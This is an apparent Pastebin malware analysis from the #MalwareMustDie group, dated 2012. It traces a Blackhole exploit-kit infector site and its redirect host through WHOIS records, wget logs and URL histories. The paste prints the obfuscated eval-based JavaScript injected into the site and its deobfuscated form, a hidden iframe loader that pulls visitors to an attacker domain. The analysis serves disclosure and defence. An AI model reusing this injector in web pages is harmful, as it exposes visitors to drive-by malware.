Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*==========================================
- Blackhole server infector monitor analysis..
- Detected from: 2012-09-27
- Recorded to : 2012-10-03
- Research of #MalwareMustDie
- - we don't steal, we seek by our own resource,
- we expose, to raise malware awareness, not to mess other's work
- we share, to all malware victims, to end the blindness of malware victimization
- whose are fooled by many security protection craps..
- this is at least a good deed in our limited/short internet uptimes
- Researched by @unixfreaxjp
- Oct 3rd, 23:31 GMT+9
- ==========================================*/
- // This blackhole servers one is infector actively infect via various spams
- // linked url lead to 173.236.136.84, while in 173.236.136.84 people are
- // redirected to another evil host: 67.208.74.71 of which hacing a long
- // history trace in blackhole infections..
- //
- // The actors is so clever to play hide and seek with us,
- // what we expose is what we monitor in the past days,
- // I hope authorities in US can do something to nail these
- // infectors scheme, by intercept these hosts' activity to get to
- // link to the actors.
- //
- // #MalwareMustDie!
- // Infector background
- IP: 173.236.136.84 / Host: www.teamrainert.com
- NetRange: 173.236.128.0 - 173.236.255.255
- CIDR: 173.236.128.0/17
- OriginAS: AS26347
- NetName: DREAMHOST-BLK10
- NetHandle: NET-173-236-128-0-1
- Parent: NET-173-0-0-0-0
- NetType: Direct Allocation
- RegDate: 2010-03-30
- Updated: 2012-03-02
- Ref: http://whois.arin.net/rest/net/NET-173-236-128-0-1
- OrgName: New Dream Network, LLC
- OrgId: NDN
- Address: 417 Associated Rd.
- Address: PMB #257
- City: Brea
- StateProv: CA
- PostalCode: 92821
- Country: US
- RegDate: 2001-04-17
- Updated: 2012-09-27
- Ref: http://whois.arin.net/rest/org/NDN
- //----------------------------------------------------------------------------
- // Infector history (source spamdb/blacklists)
- 2012-09-27 06:41:09 http://teamrainert.com/2010/12/28/top-13-baby-products-from-zero-to-four-months/
- 2012-09-27 06:41:10 http://www.teamrainert.com/2010/12/28/top-13-baby-products-from-zero-to-four-months/
- 2012-09-27 14:49:08 http://teamrainert.com/2010/12/28/top-13-baby-products-from-zero-to-four-months
- 2012-09-29 02:31:44 http://www.teamrainert.com/?cat=
- 2012-10-01 13:53:37 http://www.teamrainert.com/
- 2012-10-01 21:28:35 http://teamrainert.com/?cat=
- //--------------------------------------------------------------------------
- // One shot to kill...
- --21:59:58-- http://www.teamrainert.com/
- => `index.html'
- Resolving www.teamrainert.com... 173.236.136.84
- Connecting to www.teamrainert.com|173.236.136.84|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 46,621 (46K) [text/html]
- 100%[====================================>] 46,621 9.71K/s ETA 00:00
- 22:00:04 (9.70 KB/s) - `index.html' saved [46621/46621]
- //-------------------------------------------------------------------------
- // detection alerts...
- [2012-10-03 22:08:14] [HTTP] URL: http://www.teamrainert.com/ (Status: 200, Referrer: None)
- [2012-10-03 22:08:17] [Window] Eval argument length > 64 (812)
- //-------------------------------------------------------------------------
- // evilcode found...
- <script>h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["substr"](2);}w=this;e=w[f.substr(11)+zz];t='y';} n="3.5!3.5!51.5!50!15!19!49!54.5!48.5!57.5!53.5!49.5!54!57!22!50.5!49.5!57!33.5!53!49.5!53.5!49.5!54!57!56.5!32!59.5!41!47.5!50.5!38!47.5!53.5!49.5!19!18.5!48!54.5!49!59.5!18.5!19.5!44.5!23!45.5!19.5!60.5!5.5!3.5!3.5!3.5!51.5!50!56!47.5!53.5!49.5!56!19!19.5!28.5!5.5!3.5!3.5!61.5!15!49.5!53!56.5!49.5!15!60.5!5.5!3.5!3.5!3.5!49!54.5!48.5!57.5!53.5!49.5!54!57!22!58.5!56!51.5!57!49.5!19!16!29!51.5!50!56!47.5!53.5!49.5!15!56.5!56!48.5!29.5!18.5!51!57!57!55!28!22.5!22.5!51!52!52.5!53!53!53!53!51!51!50.5!50.5!50.5!50.5!50!50!50!58!58!48!48!48!54!22!50!51.5!54!49!51!49.5!56!49.5!22!54.5!56!50.5!22.5!30.5!50.5!54.5!29.5!24!18.5!15!58.5!51.5!49!57!51!29.5!18.5!23.5!23!18.5!15!51!49.5!51.5!50.5!51!57!29.5!18.5!23.5!23!18.5!15!56.5!57!59.5!53!49.5!29.5!18.5!58!51.5!56.5!51.5!48!51.5!53!51.5!57!59.5!28!51!51.5!49!49!49.5!54!28.5!55!54.5!56.5!51.5!57!51.5!54.5!54!28!47.5!48!56.5!54.5!53!57.5!57!49.5!28.5!53!49.5!50!57!28!23!28.5!57!54.5!55!28!23!28.5!18.5!30!29!22.5!51.5!50!56!47.5!53.5!49.5!30!16!19.5!28.5!5.5!3.5!3.5!61.5!5.5!3.5!3.5!50!57.5!54!48.5!57!51.5!54.5!54!15!51.5!50!56!47.5!53.5!49.5!56!19!19.5!60.5!5.5!3.5!3.5!3.5!58!47.5!56!15!50!15!29.5!15!49!54.5!48.5!57.5!53.5!49.5!54!57!22!48.5!56!49.5!47.5!57!49.5!33.5!53!49.5!53.5!49.5!54!57!19!18.5!51.5!50!56!47.5!53.5!49.5!18.5!19.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!56.5!56!48.5!18.5!21!18.5!51!57!57!55!28!22.5!22.5!51!52!52.5!53!53!53!53!51!51!50.5!50.5!50.5!50.5!50!50!50!58!58!48!48!48!54!22!50!51.5!54!49!51!49.5!56!49.5!22!54.5!56!50.5!22.5!30.5!50.5!54.5!29.5!24!18.5!19.5!28.5!50!22!56.5!57!59.5!53!49.5!22!58!51.5!56.5!51.5!48!51.5!53!51.5!57!59.5!29.5!18.5!51!51.5!49!49!49.5!54!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!55!54.5!56.5!51.5!57!51.5!54.5!54!29.5!18.5!47.5!48!56.5!54.5!53!57.5!57!49.5!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!53!49.5!50!57!29.5!18.5!23!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!57!54.5!55!29.5!18.5!23!18.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!58.5!51.5!49!57!51!18.5!21!18.5!23.5!23!18.5!19.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!51!49.5!51.5!50.5!51!57!18.5!21!18.5!23.5!23!18.5!19.5!28.5!5.5!3.5!3.5!3.5!49!54.5!48.5!57.5!53.5!49.5!54!57!22!50.5!49.5!57!33.5!53!49.5!53.5!49.5!54!57!56.5!32!59.5!41!47.5!50.5!38!47.5!53.5!49.5!19!18.5!48!54.5!49!59.5!18.5!19.5!44.5!23!45.5!22!47.5!55!55!49.5!54!49!32.5!51!51.5!53!49!19!50!19.5!28.5!5.5!3.5!3.5!61.5"["split"]("a!".substr(1));for(i=6-2-1-2-1;i!=605;i++){j=i;if(st)ss=ss+st[f](-h*(1+1*n[j]));}if(zz)q=ss;if(t)e(""+q);</script>
- //-------------------------------------------------------------------------
- // deobfs step 1 of evil code...
- if (document.getElementsByTagName('body')[0]){
- iframer();
- }
- else {
- document.write("
- <iframe src='http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2'
- width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'>
- </iframe>");
- }
- function iframer(){
- var f = document.createElement('iframe');
- f.setAttribute('src', 'http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2');
- f.style.visibility = 'hidden';
- f.style.position = 'absolute';
- f.style.left = '0';
- f.style.top = '0';
- f.setAttribute('width', '10');
- f.setAttribute('height', '10');
- document.getElementsByTagName('body')[0].appendChild(f);
- //-------------------------------------------------------------------------
- // 2nd deobfs evil code.. evil iframe came up..
- <iframe src='http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2'
- width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'>
- </iframe>
- //-------------------------------------------------------------------------
- // fetch config , settings: 3 modes, w/o tor, tor, "gatling fethcing gun"
- user-agent="Mozilla/5.0 (X11; U; NetBSD"
- referer="http://www.teamrainert.com/"
- target="http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2"
- // without tor
- --22:29:04-- http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2
- => `index.html@go=2'
- Resolving hjkllllhhggggfffvvbbbn.findhere.org... 67.208.74.71
- Connecting to hjkllllhhggggfffvvbbbn.findhere.org|67.208.74.71|:80... connected.
- HTTP request sent, awaiting response... 301 Moved Permanently
- Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org [following]
- --22:29:05-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org
- => `redir_not_found.shtml@hjkllllhhggggfffvvbbbn.findhere.org.1'
- Resolving domainpark.sitelutions.com... 67.208.74.12
- Connecting to domainpark.sitelutions.com|67.208.74.12|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: unspecified [text/html]
- 22:29:06 (57.20 MB/s) - `redir_not_found.shtml@hjkllllhhggggfffvvbbbn.findhere.org.1' saved [5680]
- // with tor
- --2012-10-03 22:33:17-- http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2
- Resolving localhost (localhost)... 127.0.0.1, ::1
- Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
- Proxy request sent, awaiting response... 301 Moved Permanently
- Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org [following]
- --2012-10-03 22:33:18-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org
- Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
- Proxy request sent, awaiting response... 200 OK
- Length: unspecified [text/html]
- Saving to: `index.html?go=2'
- 2012-10-03 22:33:20 (30.4 KB/s) - `index.html?go=2' saved [5680]
- // gatling "fetching" gun
- --22:36:00-- http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2
- => `index.html?go=2'
- Resolving hjkllllhhggggfffvvbbbn.findhere.org... 67.208.74.71
- Connecting to hjkllllhhggggfffvvbbbn.findhere.org|67.208.74.71|:80... connected.
- HTTP request sent, awaiting response... 301 Moved Permanently
- Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org [following]
- --22:36:01-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org
- => `redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org'
- Resolving domainpark.sitelutions.com... 67.208.74.12
- Connecting to domainpark.sitelutions.com|67.208.74.12|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: unspecified [text/html]
- 22:36:02 (25.03 KB/s) - `redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org' saved [5680]
- // --lynx snips----
- Redirection Not Found hjkllllhhggggfffvvbbbn.findhere.org
- The website hjkllllhhggggfffvvbbbn.findhere.org is (or was) utilizing the Sitelutions Redirection Engine.
- Unfortunately, the URL has been entered incorrectly, or
- the site has been deleted by its owner. Below are some of our other services and features that we offer.
- //----------------------------------------------------
- // alternative infector urls...
- --2012-10-03 22:57:27-- http://teamrainert.com/?cat=
- Resolving localhost (localhost)... 127.0.0.1, ::1
- Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
- Proxy request sent, awaiting response... 301 Moved Permanently
- Location: http://www.teamrainert.com/?cat= [following]
- --2012-10-03 22:57:29-- http://www.teamrainert.com/?cat=
- Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
- Proxy request sent, awaiting response... 301 Moved Permanently
- Location: http://www.teamrainert.com/ [following]
- --2012-10-03 22:57:31-- http://www.teamrainert.com/
- Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
- Proxy request sent, awaiting response... 200 OK
- Length: 43829 (43K) [text/html]
- Saving to: `index.html?cat='
- 100%[========>] 43,829 30.0K/s in 1.4s
- 2012-10-03 22:57:35 (30.0 KB/s) - `index.html?cat=' saved [43829/43829] <--- same page as pr above lynx snipped
- //result...
- currently CLEAN Site... at least FOR NOW, and so other urls too...
- //-----------------------------------------------------------------
- The history of reported cases of redir target host: 67.208.74.71
- 2012-10-01 17:29:21 http://olpqqvuwlb.ontheweb.nu/?go=2
- 2012-09-30 04:02:02 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-30 03:02:02 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-30 02:58:34 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-29 19:48:00 http://epafyszpyfoc.lookin.at
- 2012-09-25 22:02:02 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-25 21:02:10 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-25 20:02:02 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-24 17:51:57 http://svglxngnnwmm.rr.nu
- 2012-09-23 20:02:05 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-23 20:02:05 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-23 19:02:03 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-23 19:02:02 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-22 22:02:04 http://scielethktt.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-22 21:02:23 http://scielethktt.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-22 20:02:04 http://scielethktt.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-22 19:02:03 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-22 18:02:03 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-22 17:02:01 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-21 01:02:03 http://tpwwdgyqwse.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-21 00:02:25 http://tpwwdgyqwse.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-20 23:02:03 http://tpwwdgyqwse.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-17 20:02:03 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-17 19:02:10 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-17 18:02:04 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-16 19:02:07 http://sikxiqvsek.kwik.to/main.php?page=c9ee61ed42809775
- 2012-09-16 18:02:03 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-16 17:02:08 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-16 16:02:02 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-16 12:44:40 http://67.208.74.71
- 2012-09-15 21:02:04 http://sikxiqvsek.kwik.to/main.php?page=c9ee61ed42809775
- 2012-09-15 20:02:08 http://sikxiqvsek.kwik.to/main.php?page=c9ee61ed42809775
- 2012-09-15 20:02:05 http://qzbeakfwyvqf.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-15 19:02:13 http://qzbeakfwyvqf.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-15 19:02:05 http://sikxiqvsek.kwik.to/main.php?page=c9ee61ed42809775
- 2012-09-15 18:02:03 http://qzbeakfwyvqf.byinter.net/main.php?page=c9ee61ed42809775
- 2012-09-15 16:02:06 http://gcykrglro.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-15 15:02:29 http://gcykrglro.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-15 14:02:02 http://gcykrglro.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-14 20:02:22 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-14 19:02:11 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-14 18:02:02 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-14 16:56:54 http://lookin.at
- 2012-09-14 16:32:29 http://rr.nu
- 2012-09-13 19:16:50 http://satsudtowpco.rr.nu
- 2012-09-13 15:02:06 http://jtohmesaao.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-13 15:02:05 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-13 14:02:12 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-13 14:02:12 http://jtohmesaao.ontheweb.nu/main.php?page=c9ee61ed42809775
- 2012-09-13 13:02:04 http://jtohmesaao.ontheweb.nu/main.php?page=c9ee61ed42809775
- //----------------------------------------------------------------
- // I picked one: http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- // Settings: Adobe Reader: 8.0, Java: 1.6_10
- --2012-10-03 23:14:18-- http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
- Resolving localhost (localhost)... 127.0.0.1, ::1
- Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
- Proxy request sent, awaiting response... 301 Moved Permanently
- Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?koqjhmmhcm.byinter.net [following]
- --2012-10-03 23:14:20-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?koqjhmmhcm.byinter.net
- Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
- Proxy request sent, awaiting response... 200 OK
- Length: unspecified [text/html]
- Saving to: `main.php?page=c9ee61ed42809775'
- 2012-10-03 23:14:22 (12.8 KB/s) - `main.php?page=c9ee61ed42809775' saved [5654]
- // Found zips.. except the link to the google commrcial...
- <!doctype html>
- <html>
- <body>
- <script>
- google_ad_channel = "";
- google_ad_client = "pub-2844624690808284";
- google_ad_format = "728x90_as";
- google_ad_height = 90;
- google_ad_type = "text_image";
- google_ad_width = 728;
- google_color_bg = "FFFFFF";
- google_color_border = "FFFFFF";
- google_color_link = "0000FF";
- google_color_text = "000000";
- google_color_url = "008000";
- google_show_ads_impl = true;
- google_unique_id = 1;
- google_async_iframe_id = "aswift_0";
- google_start_time = 1348970528339;
- google_expand_experiment = "none";
- google_bpp = 8;
- </script>
- <script src="http://pagead2.googlesyndication.com/pagead/js/r20120919/r20120730/show_ads_impl.js">
- </script>
- </body>
- </html>
- //----------------------------------------
- // while WHOIS showed...
- IP: 67.208.74.71
- InfoRelay Online Systems, Inc. INFORELAY-NETBLOCK01 (NET-67-208-64-0-1) 67.208.64.0 - 67.208.95.255
- InfoRelay Online Systems, Inc. INFORELAY-LBSERVERS-02 (NET-67-208-74-64-1) 67.208.74.64 - 67.208.74.95
- Routings...
- ASN | Prefix | ASName | CN | Domain | ISP of an IP Address
- 33597 | 67.208.74.0/23 | INFORELAY | US | INFORELAY.NET | INFORELAY ONLINE SYSTEMS INC.
- //------ end of analysis ------
- #MalwareMustDie!
Advertisement
RAW Paste Data
Copied
Advertisement